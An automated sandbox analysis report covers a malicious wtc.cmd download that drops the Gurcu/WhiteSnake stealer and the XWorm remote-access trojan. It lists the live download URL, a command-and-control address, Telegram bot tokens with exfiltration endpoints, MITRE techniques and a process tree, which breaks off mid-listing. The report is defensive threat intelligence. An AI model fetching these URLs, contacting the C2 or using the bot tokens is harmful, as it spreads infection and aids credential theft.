gurcu | hxxp://64[.]7[.]198[.]63/wtc[.]cmd

Analysis

max time kernel
297s
max time network
301s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
19-01-2025 11:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://64.7.198.63/wtc.cmd

Score

10^/10

gurcu xworm collection credential_access defense_evasion discovery execution persistence privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

Version

5.0

154.216.19.12:7000

Mutex

QHMc6qbZcmJeh5Wz

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot7830414956:AAEyqRgiEQW-DV0wawv6-EaJ6kx7dVhrDyc

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot7830414956:AAEyqRgiEQW-DV0wawv6-EaJ6kx7dVhrDyc/sendMessage?chat_id=-4652967507

https://api.telegram.org/bot7833034082:AAHrtbPzgrxV0U2nPIcyRGepQ0loVNSKN94/sendMessage?chat_id=-4563001294

https://api.telegram.org/bot7991608689:AAFUN71TMgyF_fzKFz6tyyBijaijI3s82tk/sendMessage?chat_id=-4563001294

Signatures

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral2/memory/5216-571-0x00000000003D0000-0x00000000003E0000-memory.dmp	family_xworm
behavioral2/files/0x0004000000024f50-635.dat	family_xworm
behavioral2/memory/4944-640-0x00000000007F0000-0x0000000000800000-memory.dmp	family_xworm
behavioral2/memory/5756-667-0x0000000000250000-0x0000000000260000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 5420 created 3280	5420	Guard.exe	53
PID 5420 created 3280	5420	Guard.exe	53

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 6 IoCs

flow	pid	Process
11	4416	powershell.exe
12	4416	powershell.exe
13	396	powershell.exe
14	396	powershell.exe
16	5284	powershell.exe
17	5284	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 23 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4416	powershell.exe
396	powershell.exe
2836	powershell.exe
3440	powershell.exe
2996	powershell.exe
1468	powershell.exe
4196	powershell.exe
5856	powershell.exe
2992	powershell.exe
4512	powershell.exe
4376	powershell.exe
1940	powershell.exe
4280	powershell.exe
576	powershell.exe
1404	powershell.exe
3124	powershell.exe
5284	powershell.exe
1564	powershell.exe
4408	powershell.exe
4152	powershell.exe
5724	powershell.exe
5580	powershell.exe
5956	powershell.exe

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1828	cmd.exe
5548	powershell.exe
2728	cmd.exe
1904	powershell.exe

Drops startup file 5 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	etuaxj.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	etuaxj.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	bound.exe

Executes dropped EXE 12 IoCs

pid	Process
884	wts.exe
3748	winb.exe
4256	winb.exe
5420	Guard.exe
960	rar.exe
5216	jsc.exe
5188	hjukrl.exe
3304	hjukrl.exe
4944	etuaxj.exe
5756	bound.exe
228	rar.exe
6072	notepad.exe

Loads dropped DLL 34 IoCs

pid	Process
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
4256	winb.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe
3304	hjukrl.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\notepad = "C:\\Users\\Admin\\AppData\\Roaming\\notepad.exe"	etuaxj.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com
8	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x002200000002aab7-139.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
5652	tasklist.exe
964	tasklist.exe
5480	tasklist.exe
1148	tasklist.exe
4380	tasklist.exe
1680	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x001900000002ab73-190.dat	upx
behavioral2/memory/4256-194-0x00007FFD16EA0000-0x00007FFD17503000-memory.dmp	upx
behavioral2/files/0x001900000002ab5b-196.dat	upx
behavioral2/memory/4256-198-0x00007FFD1DBE0000-0x00007FFD1DC07000-memory.dmp	upx
behavioral2/files/0x001900000002ab71-200.dat	upx
behavioral2/files/0x001900000002ab64-217.dat	upx
behavioral2/files/0x001900000002ab63-216.dat	upx
behavioral2/files/0x001c00000002ab62-215.dat	upx
behavioral2/files/0x001900000002ab61-214.dat	upx
behavioral2/files/0x001900000002ab5e-213.dat	upx
behavioral2/files/0x001900000002ab5d-212.dat	upx
behavioral2/files/0x001c00000002ab5c-211.dat	upx
behavioral2/files/0x001900000002ab58-210.dat	upx
behavioral2/files/0x001900000002ab78-209.dat	upx
behavioral2/files/0x001900000002ab77-208.dat	upx
behavioral2/files/0x001900000002ab76-207.dat	upx
behavioral2/files/0x001900000002ab72-204.dat	upx
behavioral2/files/0x001900000002ab70-203.dat	upx
behavioral2/memory/4256-201-0x00007FFD358A0000-0x00007FFD358AF000-memory.dmp	upx
behavioral2/memory/4256-223-0x00007FFD1DBB0000-0x00007FFD1DBDB000-memory.dmp	upx
behavioral2/memory/4256-227-0x00007FFD1DB60000-0x00007FFD1DB85000-memory.dmp	upx
behavioral2/memory/4256-229-0x00007FFD1D5C0000-0x00007FFD1D73F000-memory.dmp	upx
behavioral2/memory/4256-225-0x00007FFD1DB90000-0x00007FFD1DBA9000-memory.dmp	upx
behavioral2/memory/4256-233-0x00007FFD35760000-0x00007FFD3576D000-memory.dmp	upx
behavioral2/memory/4256-232-0x00007FFD1DB40000-0x00007FFD1DB59000-memory.dmp	upx
behavioral2/memory/4256-241-0x00007FFD16960000-0x00007FFD16E93000-memory.dmp	upx
behavioral2/memory/4256-240-0x00007FFD1D320000-0x00007FFD1D3EE000-memory.dmp	upx
behavioral2/memory/4256-239-0x00007FFD16EA0000-0x00007FFD17503000-memory.dmp	upx
behavioral2/memory/4256-243-0x00007FFD1DBE0000-0x00007FFD1DC07000-memory.dmp	upx
behavioral2/memory/4256-235-0x00007FFD1D580000-0x00007FFD1D5B4000-memory.dmp	upx
behavioral2/memory/4256-245-0x00007FFD1DBB0000-0x00007FFD1DBDB000-memory.dmp	upx
behavioral2/memory/4256-246-0x00007FFD1D560000-0x00007FFD1D574000-memory.dmp	upx
behavioral2/memory/4256-248-0x00007FFD356D0000-0x00007FFD356DD000-memory.dmp	upx
behavioral2/memory/4256-254-0x00007FFD1D260000-0x00007FFD1D313000-memory.dmp	upx
behavioral2/memory/4256-253-0x00007FFD1DB90000-0x00007FFD1DBA9000-memory.dmp	upx
behavioral2/memory/4256-286-0x00007FFD1DB60000-0x00007FFD1DB85000-memory.dmp	upx
behavioral2/memory/4256-370-0x00007FFD1D5C0000-0x00007FFD1D73F000-memory.dmp	upx
behavioral2/memory/4256-488-0x00007FFD1D580000-0x00007FFD1D5B4000-memory.dmp	upx
behavioral2/memory/4256-490-0x00007FFD1D320000-0x00007FFD1D3EE000-memory.dmp	upx
behavioral2/memory/4256-491-0x00007FFD16960000-0x00007FFD16E93000-memory.dmp	upx
behavioral2/memory/4256-511-0x00007FFD1D560000-0x00007FFD1D574000-memory.dmp	upx
behavioral2/memory/4256-521-0x00007FFD16EA0000-0x00007FFD17503000-memory.dmp	upx
behavioral2/memory/4256-535-0x00007FFD1D260000-0x00007FFD1D313000-memory.dmp	upx
behavioral2/memory/4256-527-0x00007FFD1D5C0000-0x00007FFD1D73F000-memory.dmp	upx
behavioral2/memory/4256-546-0x00007FFD1D320000-0x00007FFD1D3EE000-memory.dmp	upx
behavioral2/memory/4256-550-0x00007FFD1D260000-0x00007FFD1D313000-memory.dmp	upx
behavioral2/memory/4256-553-0x00007FFD16960000-0x00007FFD16E93000-memory.dmp	upx
behavioral2/memory/4256-552-0x00007FFD35760000-0x00007FFD3576D000-memory.dmp	upx
behavioral2/memory/4256-549-0x00007FFD356D0000-0x00007FFD356DD000-memory.dmp	upx
behavioral2/memory/4256-548-0x00007FFD1D560000-0x00007FFD1D574000-memory.dmp	upx
behavioral2/memory/4256-545-0x00007FFD1D580000-0x00007FFD1D5B4000-memory.dmp	upx
behavioral2/memory/4256-543-0x00007FFD1DB40000-0x00007FFD1DB59000-memory.dmp	upx
behavioral2/memory/4256-542-0x00007FFD1D5C0000-0x00007FFD1D73F000-memory.dmp	upx
behavioral2/memory/4256-541-0x00007FFD1DB60000-0x00007FFD1DB85000-memory.dmp	upx
behavioral2/memory/4256-540-0x00007FFD1DB90000-0x00007FFD1DBA9000-memory.dmp	upx
behavioral2/memory/4256-539-0x00007FFD1DBB0000-0x00007FFD1DBDB000-memory.dmp	upx
behavioral2/memory/4256-538-0x00007FFD358A0000-0x00007FFD358AF000-memory.dmp	upx
behavioral2/memory/4256-537-0x00007FFD1DBE0000-0x00007FFD1DC07000-memory.dmp	upx
behavioral2/memory/4256-536-0x00007FFD16EA0000-0x00007FFD17503000-memory.dmp	upx
behavioral2/memory/3304-629-0x00007FFD332F0000-0x00007FFD338DE000-memory.dmp	upx
behavioral2/memory/3304-631-0x00007FFD3FA10000-0x00007FFD3FA1F000-memory.dmp	upx
behavioral2/memory/3304-630-0x00007FFD3E840000-0x00007FFD3E864000-memory.dmp	upx
behavioral2/memory/3304-645-0x00007FFD3E780000-0x00007FFD3E7AD000-memory.dmp	upx
behavioral2/memory/3304-646-0x00007FFD3E760000-0x00007FFD3E779000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Guard.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4628	cmd.exe
5644	netsh.exe
332	cmd.exe
6068	netsh.exe

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
4524	timeout.exe
1288	timeout.exe
3924	timeout.exe
5588	timeout.exe
5636	timeout.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3584	WMIC.exe
1972	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5428	systeminfo.exe
5560	systeminfo.exe

Kills process with taskkill 7 IoCs

evasion

pid	Process
1656	taskkill.exe
5408	taskkill.exe
5976	taskkill.exe
5612	taskkill.exe
5688	taskkill.exe
956	taskkill.exe
3192	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133817614692571624"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	chrome.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\wtc.cmd:Zone.Identifier	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2252	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4868	chrome.exe
4868	chrome.exe
576	powershell.exe
576	powershell.exe
1404	powershell.exe
1404	powershell.exe
4416	powershell.exe
4416	powershell.exe
3124	powershell.exe
3124	powershell.exe
2836	powershell.exe
2836	powershell.exe
3440	powershell.exe
396	powershell.exe
396	powershell.exe
3440	powershell.exe
4408	powershell.exe
4408	powershell.exe
4152	powershell.exe
4152	powershell.exe
1468	powershell.exe
4152	powershell.exe
1468	powershell.exe
4408	powershell.exe
1468	powershell.exe
5548	powershell.exe
5548	powershell.exe
5636	powershell.exe
5636	powershell.exe
5548	powershell.exe
5636	powershell.exe
5284	powershell.exe
5284	powershell.exe
5284	powershell.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
4196	powershell.exe
4196	powershell.exe
5420	Guard.exe
5420	Guard.exe
5544	powershell.exe
5544	powershell.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe
5856	powershell.exe
5856	powershell.exe
6080	powershell.exe
6080	powershell.exe
1564	powershell.exe
1564	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
4868	chrome.exe
4868	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe

Suspicious use of FindShellTrayWindow 46 IoCs

pid	Process
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
884	wts.exe
884	wts.exe
884	wts.exe
884	wts.exe
884	wts.exe
884	wts.exe
884	wts.exe
884	wts.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe

Suspicious use of SendNotifyMessage 23 IoCs

pid	Process
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
884	wts.exe
884	wts.exe
884	wts.exe
884	wts.exe
884	wts.exe
884	wts.exe
884	wts.exe
884	wts.exe
5420	Guard.exe
5420	Guard.exe
5420	Guard.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
5216	jsc.exe
4944	etuaxj.exe
5756	bound.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4868 wrote to memory of 4924	4868	chrome.exe	78
PID 4868 wrote to memory of 4924	4868	chrome.exe	78
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 1724	4868	chrome.exe	79
PID 4868 wrote to memory of 780	4868	chrome.exe	80
PID 4868 wrote to memory of 780	4868	chrome.exe	80
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81
PID 4868 wrote to memory of 1300	4868	chrome.exe	81

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://64.7.198.63/wtc.cmd
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4868
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd3662cc40,0x7ffd3662cc4c,0x7ffd3662cc58
    3⤵
    PID:4924
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1760,i,2443892208283643395,6623879741041551108,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1752 /prefetch:2
    3⤵
    PID:1724
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2032,i,2443892208283643395,6623879741041551108,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2108 /prefetch:3
    3⤵
    PID:780
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2152,i,2443892208283643395,6623879741041551108,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2500 /prefetch:8
    3⤵
    PID:1300
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3000,i,2443892208283643395,6623879741041551108,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3016 /prefetch:1
    3⤵
    PID:3924
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3012,i,2443892208283643395,6623879741041551108,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3256 /prefetch:1
    3⤵
    PID:2924
- - C:\Program Files\Google\Chrome\Application\chrome.exe
